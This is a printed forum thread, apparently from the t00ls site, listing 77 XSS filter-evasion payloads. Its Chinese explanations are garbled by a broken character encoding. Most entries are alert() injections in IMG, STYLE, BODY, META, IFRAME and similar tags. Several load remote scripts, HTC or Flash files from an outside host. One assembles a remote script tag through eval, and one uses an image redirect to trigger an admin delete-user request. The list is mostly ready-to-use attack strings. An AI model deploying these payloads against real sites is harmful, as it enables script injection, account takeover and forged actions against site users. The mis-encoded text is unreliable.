XSS
òƹxsst00lsȽ٣öCopy֪ľͯЬҪMarkġ(1)ͨXSS JavaScriptע
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMGǩXSSʹJavaScript
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMGǩֺ
<IMG SRC=javascript:alert(XSS)>
(4)IMGǩСд
<IMG SRC=JaVaScRiPt:alert(XSS)>
(5)HTML(зֺ)
<IMG SRC=javascript:alert(XSS)>
(6)ȱIMGǩ
<IMG "><SCRIPT>alert(XSS)</SCRIPT>>
(7)formCharCodeǩ()
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8Unicode()
<IMG SRC=jav..ʡ..S')>
(9)7λUTF-8Unicodeûзֺŵ()
<IMG SRC=jav..ʡ..S')>
(10)ʮƱҲûзֺ()
<IMG SRC=java..ʡ..XSS')>
(11)Ƕʽǩ,Javascriptֿ
<IMG SRC=jav ascript:alert(XSS);>
(12)Ƕʽǩ,Javascriptֿ
<IMG SRC=jav ascript:alert(XSS);>
(13)Ƕʽз
<IMG SRC=jav ascript:alert(XSS);>
(14)Ƕʽس
<IMG SRC=jav ascript:alert(XSS);>
(15)ǶʽעJavaScript,XSS˵
<IMG SRC=javascript:alert(XSS)>
(16)ַ(Ҫͬҳ)
<script>z=document.</script>
<script>z=z+write(</script>
<script>z=z+<script</script>
<script>z=z+ src=ht</script>
<script>z=z+tp://ww</script>
<script>z=z+w.shell</script>
<script>z=z+.net/1.</script>
<script>z=z+js></sc</script>
<script>z=z+ript>)</script>
<script>eval_r(z)</script>
(17)ַ12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e print <IMG SRC=java\0script:alert(\XSS\)>; > out
(18)ַ2,ַڹڻûЧ.Ϊûеط
perl -e print <SCR\0IPT>alert(\XSS\)</SCR\0IPT>; > out
(19)SpacesmetaǰIMGǩ
<IMG SRC= javascript:alert(XSS);>
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=http://3w.org/XSS/xss.js></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(XSS)>
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=http://3w.org/XSS/xss.js></SCRIPT>
(23)˫
<<SCRIPT>alert(XSS);//<</SCRIPT>
(24)ű()
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)ű2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)뿪HTML/JavaScript XSS
<IMG SRC=javascript:alert(XSS)
(27)˫
<iframe src=http://3w.org/XSS.html <
(28) ˫ ֺ
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29)˵JavaScript
\;alert(XSS);//
(30)Titleǩ
</TITLE><SCRIPT>alert(XSS);</SCRIPT>
(31)Input Image
<INPUT SRC=javascript:alert(XSS);>
(32)BODY Image
<BODY BACKGROUND=javascript:alert(XSS)>
(33)BODYǩ
<BODY(XSS)>
(34)IMG Dynsrc
<IMG DYNSRC=javascript:alert(XSS)>
(35)IMG Lowsrc
<IMG LOWSRC=javascript:alert(XSS)>
(36)BGSOUND
<BGSOUND SRC=javascript:alert(XSS);>
(37)STYLE sheet
<LINK REL=stylesheet HREF=javascript:alert(XSS);>
(38)Զʽ
<LINK REL=stylesheet HREF=http://3w.org/xss.css>
(39)List-style-image(бʽ)
<STYLE>li {list-style-image: url(javascript:alert(XSS));}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC=vbscript:msgbox(XSS)></STYLE><UL><LI>XSS
(41)METAurl
<META HTTP-EQUIV=refresh CONTENT=0;
URL=http://;URL=javascript:alert(XSS);>
(42)Iframe
<IFRAME SRC=javascript:alert(XSS);></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC=javascript:alert(XSS);></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6
(44)Table
<TABLE BACKGROUND=javascript:alert(XSS)>
(45)TD
<TABLE><TD BACKGROUND=javascript:alert(XSS)>
(46)DIV background-image
<DIV STYLE=background-image: url(javascript:alert(XSS))>
(47)DIV background-image϶ַ(1-32&34&39&160&8192-
8&13&12288&65279)
<DIV STYLE=background-image: url(javascript:alert(XSS))>
(48)DIV expression
<DIV STYLE=width: expression_r(alert(XSS));>
(49)STYLEԷֲ
<IMG STYLE=xss:expression_r(alert(XSS))>
(50)STYLE(:Ǻźһĸͷ)
<XSS STYLE=xss:expression_r(alert(XSS))>
(51)STYLE background-image
<STYLE>.XSS{background-image:url(javascript:alert(XSS));}</STYLE><A
CLASS=XSS></A>
(52)IMG STYLEʽ
exppression(alert(XSS))>
(53)STYLE background
<STYLE><STYLE
type=text/css>BODY{background:url(javascript:alert(XSS))}</STYLE>
(54)BASE
<BASE HREF=javascript:alert(XSS);//>
(55)EMBEDǩ,ǶFLASH,аXSS
<EMBED SRC=http://3w.org/XSS/xss.swf ></EMBED>
(56)flashʹActionScrptԻXSSĴ
a=get;
b=URL(\";
c=javascript:;
d=alert(XSS);\);
eval_r(a+b+c+d);
(57)XML namespace.HTCļXSSһ̨
<HTML xmlns:xss>
<?import namespace=xss implementation=http://3w.org/XSS/xss.htc>
<xss:xss>XSS</xss:xss>
</HTML>
(58)JSͼƬJS
<SCRIPT SRC=></SCRIPT>
(59)IMGǶʽ,ִ
<IMG SRC=http://www.XXX.com/a.php?a=b>
(60)IMGǶʽ(a.jpgͬ)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)ƷŹ
<SCRIPT a=> SRC=http://3w.org/xss.js></SCRIPT>
(62)
<SCRIPT => SRC=http://3w.org/xss.js></SCRIPT>
(63)
<SCRIPT a=> SRC=http://3w.org/xss.js></SCRIPT>
(64)
<SCRIPT a=> SRC=http://3w.org/xss.js></SCRIPT>
(65)
<SCRIPT a=`>` SRC=http://3w.org/xss.js></SCRIPT>
(66)12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6
<SCRIPT a=>> SRC=http://3w.org/xss.js></SCRIPT>
(67)
<SCRIPT>document.write(<SCRI);</SCRIPT>PT SRC=http://3w.org/xss.js>
</SCRIPT>
(68)URL
<A HREF=http://127.0.0.1/>XSS</A>
(69)URL
<A HREF=http://3w.org>XSS</A>
(70)IPʮ
<A HREF=http://3232235521>XSS</A>
(71)IPʮ
<A HREF=http://0xc0.0xa8.000.001>XSS</A>
(72)IP˽
<A HREF=http://0300.0250.0000.0001>XSS</A>
(73)ϱ
<A HREF=h
tt p://6 6.000146.07.147/">XSS</A>
(74)ʡ
<A HREF=//www.google.com/>XSS</A>
(75)ʡ
<A HREF=http://google.com/>XSS</A>
(76)ԵDNS
<A HREF=http://www.google.com./>XSS</A>
(77)javascript
<A HREF=javascript:document.location=http://www.google.com/>XSS</A>
ԭĵַhttp://fuzzexp.org/u/0day/?p=14
ҳ:
[1]